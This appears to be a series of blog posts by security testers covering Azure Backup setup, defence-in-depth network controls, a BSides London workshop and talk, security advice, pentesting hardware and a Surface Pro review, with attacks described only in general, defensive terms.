Windows Azure Backup

I just configured the preview version of Windows Azure Backup.  It is very nice looking and easy to use once you get it up and running - but the instructions to install it are difficult to find and a bit patchy.

First you have to create a certificate for your vault.  You use a utility called makecert.exe which is part of the Windows SDK (the link in the documentation to TechNet doesn't work - so you can get it here.

http://msdn.microsoft.com/en-US/windows/desktop/aa904949

For reasons that are not clear to me the utility doesn't seem to be available as a standalone - but downloading just the tools part of the SDK contains it.

Then the documentation that actually works is here (there are several wrong versions in different places dotted across their sites).

http://msdn.microsoft.com/en-us/library/windowsazure/dn169036.aspx

The key thing is to follow the instructions exactly - you need both the .cer file and the .pfx file (the public and private keys).

Once you have followed all the instructions and configured your vault you can go ahead with the local software install.  If you have had the Beta version of the agent installed, you need to uninstall it and then install the new one.  Once the software is installed and the agent started, you can then register your server - this took a few minutes to do on my machine - so be patient with it.

Once all this is done - configuring your backup and restores is a snip.  I hope that when it comes out of preview the documentation is improved a bit.

 

Your Framework Will Fail You - Part 2 - Network Controls

This post is part of a series based on a presentation I did for the Scottish Ruby Conference in May 2013 (part 1 here) which was around defense in depth and some of the controls companies should be looking at to help protect them when something goes wrong.

The first segment to cover is Firewalling. Network firewalls get quite a bit of flack in the security world, mainly because people tend to rely too heavily on them for protection without really understanding where they are and are not useful.

The "low-risk" setup option that I covered is around the use of egress filtering on firewalls.

One of the main limitations that I see on practical firewall deployments is that they don't take a "default deny" position for all interfaces. In the typical Internet facing firewall setup almost every one will have a default deny rule from the untrusted network (e.g. the Internet), to the more trusted network (e.g. An internal network) but in many cases the other direction (from internal to Internet) will have a default allow rule set-up.

Setting a default deny on connections from trusted-->untrusted networks can be a really useful control in making an attackers life more difficult for them and hindering their post exploitation activities. So in an e-commerce environment it might be possible to have rules on the firewall that restrict all servers from initiating any connections to the Internet except for a couple of hosts for package updates. This means that someone who has access to the server and who trys to connect to any other system on the Internet will get blocked.

If you consider an attack on a web application, once the attacker has compromised a server (e.g. via SQL Injection or command injection) one of the first things they might try to do is make a connection back to a system under their control to download more tools and also to make a shell connection to the compromised system. So with egress filtering this could be considerably trickier to pull off.

One thing if you do intend to do this is, I would recommend putting it in place when you're designing the network. Retro-fitting more restrictive firewall rules can be quite difficult as things like periodic connections that only happen once a month might not be noticed, leading to unexpected failures after the firewall rules have been put in place.

The "high risk" setup option looking at the area of network segregation. One of the setups I've seen quite commonly is that only one firewall is used, with all Internet facing systems in a single DMZ and then potentially all back-end systems on either the Internal network or perhaps in another single DMZ network. It's a setup I call the "warm smarty" approach to security crunchy on the outside but soft and gooey once you get past the shell.

The problem with this approach is that once an attacker has compromised a single server it's much easier for them to attack other systems in the environment and expand their access. The reality is that most internal networks are pretty easy for a dedicated attacker to compromise as there's always some system that doesn't get patched somewhere, so once they're in, it's pretty much game over.

Addressing this isn't cheap or easy but effective network segmentation can make attackers lives much more difficult.

There are a variety of approaches that can be used for network segmentation. One is to segment individual Internet facing applications so that they are in their own DMZ, this can reduce the risk of onwards compromise, although it does depend on the firewall ruleset being suitably restrictive.

This approach obviously will increase management costs, for example requiring more management servers and potentially less automation of maintenance, so there is a trade-off between the desired level of security and the cost involved, but it's something that should be considered rather than just going for the default one firewall approach.

Scottish Ruby Conference Talk - Your Framework Will Fail You

I was presenting yesterday at the Scottish Ruby Conference, and given that the talk is relatively high-level as it covers a lot of ground, I thought it would be a good idea to do a series of blog posts to provide some more details and resources (link to the presentation here.)

The title of my talk was "Your framework will fail you". I had the idea for it when reading about some of the security bugs in Rails came up earlier in the year and led my to think some more about defence in depth. Anyone in security will know this as one of those things that we think is a good idea but which can be a bit of a hard sell as when someone pays for a security control (e.g. Anti-Virus, Firewall) it can be tricky to say "yep that will fail sometimes so we need to buy some other things as well".

However if anything has been proven by the increase in public vulnerabilities, exploits and compromises, it is that all security controls fail and you will be well served by having a fall-back control or detective control to notice when the main one has failed.

The way I structured the presentation was in two halves. The first looks at the important topics of threat modelling (e.g. who's going to attack you) and a bit about why defence in depth is important. After that it looks at various layers of a solution and talk about controls for a low-risk/budget scenario and a high-risk/budget one. The focus on the low risk option was to look at controls which can be put in easily/cheaply. They may not be super-effective all the time, but they have their uses. On the high-risk end I looked at things which can provide more protection but will take more resource to manage, alternative in some cases it's the same control as the low-risk version but with more time dedicated to managing it (e.g. a lot of the detective controls are only really good if well managed).

The blog posts will be coming out every other day or so looking at the solution layers and hopefully I'll get to the end of the series without interruption :)

"Performing a DIY Security Review" Workshop at BSides London

We had a great time doing our workshop at BSides London recently.  In fact we had a great time in general - the conference was lots of fun.

This was the first long(ish) workshop I had ever prepared for a conference, and I was surprised at how much work was involved in it (compared to an ordinary presentation).  We not only had to create the presentation, but build the infrastructure, create Kali builds on USB sticks, set up the demos, prepare a worksheet for the participants and prepare the two 'test reports' I had promised in the description of the workshop.  Then we had to test, test, test in an attempt to appease the dark god of demos!

We were coming down from Scotland to London for the event and quickly discovered a major drawback - we had a lot of kit....   We needed two PC laptops to be the Nessus Servers and host the vms for the demos.  We also had a Surface Pro for running the demo, a Surface RT (just for kicks) and a MacBook Air to run Rory's presentation.  Add in a switch and cables (because we didn't like the idea of trying to run eight sets of Nessus scans over wireless) plus a fourway and sundry hardprint materials for the participants and we had three huge rucksacks full of stuff.  Going down the stairs at the station I was scared I was going to tip over backwards.

Anyway after a brief panic when we thought the five hundred bottle openers we had ordered for the conference swagbags had not turned up, we found them and then got set up.  We were a bit nervous that after all the effort, no one would be interested.  When I checked the subscription sheet, we had ten signups for 8 slots (the room was on the small side).  And then people started to turn up - and there were loads more than on the sheet.  Unfortunately, we did not have room to let everyone participate in the demos, but we managed to fit everyone (16 people!) into the room although it was a bit on the hot and crowded side.

So the purpose of the workshop was to show people who were technical, but not professional testers, to prepare for a review by eliminating all easily correctable faults in advance of the test.  This would enable the tester to focus on serious issues rather than finding and documenting things such as missing patches and SSLv2.  The example given was of the imaginary UWC company - and we showed off two mock reports an 'before' with 58 vulnerabilities, and an 'after' with 6.  The 'sting' was supposed to be that amongst the six - was a critical SQL vulnerability which the tester had not had time to investigate in the first scenario, but found in the second.

We did four demos:- nmap, Nessus, and two Metasploits.  The second Metasploit was the classic which really impressed me when I started testing - using an unpatched workstation to steal an Admin's token and use it to add a user to the Domain Admins group on a fully patched DC.  The dark god did not really visit us - and everyone seemed to get on well.

We hope everyone enjoyed the workshop and thank you for coming.  Hopefully we will be able to reuse the materials in the future.

I've attached our presentation. Conducting a DIY Security Review - latest

 

Can't we do better than "We use SSL"?

I was reading the security page for another new product today and it struck my how amazingly disappointed I am that we're still at the stage that the best companies can say about their security is "Trust us we hold all your data securely, and we use military grade SSL" or words to that effect.

Not to say that SSL isn't a good way of protecting data in transit, but this is the equivalent of someone building a bank and saying "trust us, this is secure, we use the same rivets as they do in battleships".

It's ridiculous to expect users to be able to make an informed decision about security with the amount of data provided.

So what would be a better option?  Well if you're developing a product how about putting some information about the Security steps in your development process (you do have those right?).

some examples

  • We  provide all our developers with secure development training (for optional bonus, here's the areas we covered and how we assessed our developers awareness of security topics)
  • All our products have threat modelling and security architecture reviews (for optional bonus, here's the output of our threat model and what controls we put in place)
  • We have external consultants complete a security focused code review before release (for optional bonus, here's the report and what we did to address the findings)
  • We complete security testing on all our products (for optional bonus here's the report and what we did to address the findings)

now this is far from a comprehensive list and doesn't address the problem of how to ensure it's all true, but surely it's better than just SSL!

B-Sides Pentest Automation Talk

We were at B-Sides London yesterday.  It all went really well and had a great turn out.  The new venue was good as well.  We didn't get to see too many of the talks unfortunately as we were delivering a Workshop in the morning and I had my talk in the afternoon.

As with most of the talks I do, I find the questions the most interesting piece, as you get feedback on what problems other people have had with the topic at hand and also new ideas for developing the presentation.

Some of the conversations had after my talk centered around choosing a licence for code that you release.  It's a important area to consider if you're releasing your own code as you should always put some form of license up there so people know how they can and cannot use your code.  My feelings for most of the scripts I do is that a GPL based license is the best option, as it encourages other people who want to use your code to contribute back to the community.

Another point on licensing that was brought up is the flip side which is that you should always check the license of code that you make use of, to ensure that you're within the terms specified.

My presentation is up on the prezi site here .  Most of the code along with the other scripts I've released is on github here . I'll add the cookie grabber script up there over the next day or two.

Three Lines

We've decided that the results/recommendations coming out of most of the Internal Security Reviews we do can be summarised in three lines.

a)  Patch everything.  Not just Windows - everything.

b)  Change default credentials.  Don't leave your main router with creds of admin/admin

c) Get rid of clear text protocols.  Ditch telnet for SSH and ftp for sftp

It doesn't require Ninjas, Red Teams or Zero days to compromise most organisations, given access to their internal networks.  In fact why bother with anything fancy, when the most basic of techniques uncovers such glaring faults.

 

 

Tools of the trade - USB powered Switches

As a bit of a tech geek I have a tendency to pick up a variety of pieces of hardware and software to see if they'll be useful on tests.  One of my more successful purchases has been a USB powered Ethernet switch that handles PoE pass-through and has a couple of mirrored ports. It's pretty compact so it goes easily in a bag for on-site jobs and can be useful in a number of scenarios

  • Lack of Ethernet ports on-site.  I've had this on more than one occasion, you get to site and there's no free ports, so a switch and a couple of patch cables can be very handy
  • Monitoring Thick Client Apps.  Not all apps are particularly proxy friendly, so having an easy way to see all the traffic on the switch is very handy
  • VOIP assessments.  A standard part of VOIP assessments is looking at the traffic between the phone and the management servers, so having something that supports PoE pass through is handy as that's how most VOIP phones operate.

All-in-all if you're a tester, I'd recommend getting something like this.  The one I've got is the Dualcomm DCGS-2005L although I'm sure there's others that meet the bill.

Workshop at BSides London

As well as Rory's talk on pentest automation at BSides London - we will both be doing a workshop "Performing a DIY Security Review".  It is aimed at IT Professionals and shows the basics of how to prepare for a Security Review ("pentest").  This is something that is dear to our hearts because writing about SSLv2 over and over again is not something which either excites us greatly, or provides a great deal of value to customers.  We think people should do a preparatory review themselves and let the tester concentrate on the specialized stuff - giving better value for money and a shorter, more focused report.

http://www.securitybsides.org.uk/workshops.html

So the workshop is all about using free or low cost tools to look at a network and remove glaring faults from it prior to having a test done.  We don't cover web application testing - but if this one proves of interest we may do something along those lines in the future.

I'll post the slides and documentation here after the event.

 

 

Review of Surface Pro

I just got my Surface Pro a few days ago – albeit I had to import it from US with the help of a friend over there.  I’ve not had it for long so these are initial impressions I will add to later, but so far I am very pleased with it and think it is going to greatly appeal to businesses over here when it is released in UK (I hope Microsoft are reading this….).

As I mentioned in an earlier posting, I have been using Windows 8 on touch devices since it came out, first on an Iconia W500 tablet I upgraded from Win 7 myself, then RT on the Surface since Sept 2012 – so this is really a comparison between the Surface Pro and what has gone before.

Hardware

The first thing you notice when you are an RT user and take the Pro out of the box is that it is a fair bit heavier and thicker than the earlier device.  I suspect, however, that you would not realize this if you hadn’t been a heavy user of the other one.  It weighs in at 900 grams which is just enough more than the 680 grams of the Surface RT (or the 662g of the IPad3) to make you feel the difference.  So as a tablet it is on the heavy side, but by no manner of means unusably so, and I suspect that after a while I won’t notice the difference very much.  It is 1.3cm thick compared to 0.94 for the IPad3 and the Surface RT – but I don’t really find that much of a downside.

Because it has an Intel Core i5 CPU rather than the relatively low powered ARM processor in other tablet devices, it runs relatively hot and has to have internal fans.  In the time I have been using it I have yet to hear the fans come on and it is effectively completely silent.  The vent for the fans is a slim line along the top of the tablet which I would never have noticed if I hadn’t been actively looking for them (this is most of the reason for the extra thickness of the device).  The Pro also feels very slightly warm on the back of the case which the RT does not (although it is my understanding that the iPad 3 gets warm as well).  This is in comparison with the Iconia I had until last year where the fans were on almost constantly and you could use the case as a hot water bottle (I’m not knocking the Iconia btw – it was a nice machine for its time – but shows how quickly technology advances).

The general build of the tablet is very nice indeed and shows the same attention to detail as on the RT model, with the kickstand being a particularly important and well-designed feature considering that this is a productivity machine that is going to be used in laptop mode a lot.  The screen on the RT was nice enough, but the one on the Pro is absolutely lovely – very high resolution and fantastic colour depth.  It has great port specifications for a tablet with a full sized USB 3 port (as against the USB 2 on the RT), a micro SD slot and a mini DisplayPort which can be used to plug it in to a VGA or HDMI device.  For anyone sad enough to have both tablets – the two expensive video cables I bought for the RT are not compatible with the Pro, although it is compatible with any standard mini DisplayPort adapter (although apparently with some of them you have to pare a bit of plastic off the cable to allow for the bevel on the Surface’s port).  I now have it running a 24” monitor and a Mimo USB mini monitor and very nice it looks with them.

WP_20130312_003

As far as disk space is concerned, there has been a lot of MS bashing around the Surface and inadequate disk space.  I think this is nonsense as far as the 128GB model is concerned.  Out of the box I had 84G free before I installed anything else, and I could have increased this by moving the recovery partition to a USB stick.  Considering that the 128G model is only marginally more expensive that the 64G, I am not sure I would recommend the latter, and this has been borne out by sales of both models, where the 128 has been regularly out of stock.

The stylus/pen that comes with the Pro is brilliant.  Night and day between that and trying to write on the handwriting recognition keyboard with your finger or a standard stylus.

Battery was another issue that came up before the Surface Pro was released and I think this time MS were a little too eager to be honest in their announcements to the extent of under-rating the device.  I reckon that yesterday I had about five and a half hours moderate use (web browsing, Office, music, a few videos) etc out of it.  At that point it was not completely exhausted (but I was) so I put it on charge before it ran out.  I think it might get six hours if you pushed it, and that could be rated as poor compared with premium tablets, but good for an Ultrabook.    It does not have the ‘always on’ feature of ARM tablets where the screen is immediately available when you pull the keyboard back.  Instead it is more like a standard tablet ‘waking up’ where you touch the power button and it takes about five seconds to resume.

As I said in my review of the Surface RT, I am not very keen on the proprietal power adaptor which is not easy to connect to the tablet and seems a bit loose when it does connect.  I’m also not convinced that attaching the stylus to the power connector when not in use is a good idea because it then can’t be used while the device is charging.

So in case I sound negative about the Pro compared to the RT (which I didn’t mean to) here is the really big advantage it has, which to my mind is pretty much the deciding factor for professionals …

Software

I’ve worked with Windows RT including (tut tut) the jail-broken version for some time now and I really like it.  For MUI apps it runs brilliantly; it is fine for Office Home (which is included with the tablet).  As a general leisure device (browsing, music, books, video) and for occasional business use with Office and a web browser, it is absolutely great.   Additionally it can participate in homegroups with other Windows PCs and use Windows utilities like the snipping tool, explorer, task manager etc.  I am not a typical home user – but my 73 year old mother is – and for her it does everything her laptop did and more, in a much smaller form factor and with a much better battery life.  An iPad would just not have done the trick for her because she is a long time Windows user with a need for access to the file system, ability to access shares on file servers etc (without having to jump through hoops to do so).

Strangely, it was not until I jail broke mine and tried to use it in my professional capacity as a tester that I came across limitations with the RT version it which I hadn’t even thought about, but which make me realize how much I need and value the full version of Windows.

Availability of applications.  Professional people and power users need specific applications and these are not generally ones they can chose on the basis of what is available in a company store or select themselves.  They are predetermined by the company they work for, and let’s face it, unless the company is part of the small minority which use Linux or Macs – they are going to be Windows applications.  I think the respective stores for Microsoft, Apple and Google are getting there and may possibly replace desktop applications for many functions, but I don’t think the vast body of professional software which has been built up for Windows is going anywhere in a hurry.   In my professional capacity I have many applications I need which simply only run in the full version of Windows.

Performance.  The ARM processor in the RT Surface runs the applications designed for it very nicely.  It is only when you jail break it and try other stuff that you realize why MS did not allow it because a lot of them run pretty slowly and drain the battery badly.

The huge advantage of the Surface Pro is that it is a proper Windows 8 Pro PC which will run every Windows 7 or 8 compatible application out of the box – in practice most applications written for PCs in the last 10+ years.  I have a Windows experience index on the Pro of 5.61 which beats my 18 month old desktop by a decent distance.

Manageability

Probably most end users and standard geeks won’t care much about this – but having been involved in Corporate IT in a largely Microsoft environment for many years – I think I can say that many Sys Admins will.  The Surface Pro is a standard Windows PC which can be managed like any other through Active Directory and Group Policy.  It has all the security and granularity built up over the last twenty years; it can join a domain; it needs no special software installed on it and doesn’t require IT Teams to install special software on servers or jump through any hoops to get it working or make it comply with internal policy.   To my mind, this is the killer feature that will make IT departments want to run with this device rather than iPads or Androids.

In Conclusion

This week I will be trailing the Surface Pro out in earnest by running it as my primary PC for an external test.  So far it seems to be very fast and I have no real doubts that it can easily complete the task.

But actually – what is this device?  It is not quite a tablet because it is not as light as an IPad and doesn’t have the same battery stats.  It isn’t even really an Ultrabook because the form factor and display are not as good as some of the high end devices available from OEMs like Sony.  So maybe it needs to have a brand new name which would suit it and show it off to its best advantage. Perhaps an Ultratablet?  Not sure it could be sold this way but something along the lines of ‘Surface – 95% of the best tablet and 95% of the best laptop experience’

Anyway – I think both Surfaces are really great.  If I were asked which one you should get then ideally I would say ‘both’.  Here is a picture of mine sitting next to each.

WP_20130309_003